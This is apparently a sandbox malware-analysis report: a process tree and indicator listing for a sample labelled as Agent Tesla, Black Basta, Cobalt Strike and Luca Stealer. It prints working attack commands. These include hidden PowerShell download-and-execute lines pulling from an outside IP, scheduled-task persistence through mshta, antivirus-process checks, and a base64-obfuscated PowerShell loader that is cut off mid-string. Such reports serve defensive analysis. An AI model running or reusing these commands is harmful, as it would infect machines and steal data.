3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe

Suspicious use of SendNotifyMessage 22 IoCs

pid	Process
1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
852	6b651c8e26.exe
852	6b651c8e26.exe
852	6b651c8e26.exe
2788	Passwords.com
2788	Passwords.com
2788	Passwords.com
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
2912	firefox.exe
2912	firefox.exe
2912	firefox.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1760 wrote to memory of 2408	1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	30
PID 1760 wrote to memory of 2408	1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	30
PID 1760 wrote to memory of 2408	1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	30
PID 1760 wrote to memory of 2408	1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	30
PID 1760 wrote to memory of 1812	1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	31
PID 1760 wrote to memory of 1812	1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	31
PID 1760 wrote to memory of 1812	1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	31
PID 1760 wrote to memory of 1812	1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	31
PID 2408 wrote to memory of 2616	2408	cmd.exe	33
PID 2408 wrote to memory of 2616	2408	cmd.exe	33
PID 2408 wrote to memory of 2616	2408	cmd.exe	33
PID 2408 wrote to memory of 2616	2408	cmd.exe	33
PID 1812 wrote to memory of 332	1812	mshta.exe	34
PID 1812 wrote to memory of 332	1812	mshta.exe	34
PID 1812 wrote to memory of 332	1812	mshta.exe	34
PID 1812 wrote to memory of 332	1812	mshta.exe	34
PID 332 wrote to memory of 2700	332	powershell.exe	37
PID 332 wrote to memory of 2700	332	powershell.exe	37
PID 332 wrote to memory of 2700	332	powershell.exe	37
PID 332 wrote to memory of 2700	332	powershell.exe	37
PID 2700 wrote to memory of 2500	2700	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE	38
PID 2700 wrote to memory of 2500	2700	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE	38
PID 2700 wrote to memory of 2500	2700	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE	38
PID 2700 wrote to memory of 2500	2700	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE	38
PID 2500 wrote to memory of 1928	2500	rapes.exe	40
PID 2500 wrote to memory of 1928	2500	rapes.exe	40
PID 2500 wrote to memory of 1928	2500	rapes.exe	40
PID 2500 wrote to memory of 1928	2500	rapes.exe	40
PID 1928 wrote to memory of 2300	1928	amnew.exe	41
PID 1928 wrote to memory of 2300	1928	amnew.exe	41
PID 1928 wrote to memory of 2300	1928	amnew.exe	41
PID 1928 wrote to memory of 2300	1928	amnew.exe	41
PID 2500 wrote to memory of 852	2500	rapes.exe	43
PID 2500 wrote to memory of 852	2500	rapes.exe	43
PID 2500 wrote to memory of 852	2500	rapes.exe	43
PID 2500 wrote to memory of 852	2500	rapes.exe	43
PID 852 wrote to memory of 740	852	6b651c8e26.exe	44
PID 852 wrote to memory of 740	852	6b651c8e26.exe	44
PID 852 wrote to memory of 740	852	6b651c8e26.exe	44
PID 852 wrote to memory of 740	852	6b651c8e26.exe	44
PID 852 wrote to memory of 1060	852	6b651c8e26.exe	45
PID 852 wrote to memory of 1060	852	6b651c8e26.exe	45
PID 852 wrote to memory of 1060	852	6b651c8e26.exe	45
PID 852 wrote to memory of 1060	852	6b651c8e26.exe	45
PID 740 wrote to memory of 2016	740	cmd.exe	47
PID 740 wrote to memory of 2016	740	cmd.exe	47
PID 740 wrote to memory of 2016	740	cmd.exe	47
PID 740 wrote to memory of 2016	740	cmd.exe	47
PID 1060 wrote to memory of 1620	1060	mshta.exe	48
PID 1060 wrote to memory of 1620	1060	mshta.exe	48
PID 1060 wrote to memory of 1620	1060	mshta.exe	48
PID 1060 wrote to memory of 1620	1060	mshta.exe	48
PID 2500 wrote to memory of 2196	2500	rapes.exe	50
PID 2500 wrote to memory of 2196	2500	rapes.exe	50
PID 2500 wrote to memory of 2196	2500	rapes.exe	50
PID 2500 wrote to memory of 2196	2500	rapes.exe	50
PID 2196 wrote to memory of 2232	2196	cmd.exe	52
PID 2196 wrote to memory of 2232	2196	cmd.exe	52
PID 2196 wrote to memory of 2232	2196	cmd.exe	52
PID 2196 wrote to memory of 2232	2196	cmd.exe	52
PID 1620 wrote to memory of 2180	1620	powershell.exe	53
PID 1620 wrote to memory of 2180	1620	powershell.exe	53
PID 1620 wrote to memory of 2180	1620	powershell.exe	53
PID 1620 wrote to memory of 2180	1620	powershell.exe	53

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn hD273mattH6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\drXMVH8Pb.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2408
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn hD273mattH6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\drXMVH8Pb.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2616
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\drXMVH8Pb.hta
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:1812
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:332
  - - C:\Users\Admin\AppData\Local\TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
      "C:\Users\Admin\AppData\Local\TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2700
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2500
      - C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\10044010101\0a3d189781.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10044010101\0a3d189781.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:760
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10044010101\0a3d189781.exe"
        9⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\10044020101\6629328f1f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10044020101\6629328f1f.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10044020101\6629328f1f.exe"
        9⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2140
      - C:\Users\Admin\AppData\Local\Temp\10369180101\6b651c8e26.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369180101\6b651c8e26.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn XbwH1maXJj8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\tUnAPYA4f.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:740
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn XbwH1maXJj8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\tUnAPYA4f.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2016
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\tUnAPYA4f.hta
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:1060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE
        
        "C:\Users\Admin\AppData\Local\TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2180
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2196
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1812
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2808
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "lcMkBmaJyYa" /tr "mshta \"C:\Temp\1CN4Qho3p.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2860
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\1CN4Qho3p.hta"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:108
      - C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2100
      - C:\Users\Admin\AppData\Local\Temp\10369470101\e5466dd896.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369470101\e5466dd896.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2584
      - C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe"
        6⤵
        Executes dropped EXE
        
        PID:2712
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2712 -s 44
        7⤵
        Loads dropped DLL
        
        PID:2260
      - C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe"
        6⤵
        Executes dropped EXE
        
        PID:2920
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2920 -s 44
        7⤵
        Loads dropped DLL
        
        PID:836
      - C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe"
        6⤵
        Executes dropped EXE
        
        PID:2204
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2204 -s 28
        7⤵
        Loads dropped DLL
        
        PID:2792
      - C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1072
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2752
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2448
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1820
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2800
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2728
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:840
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1824
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2784
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2316
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2788
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2312
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl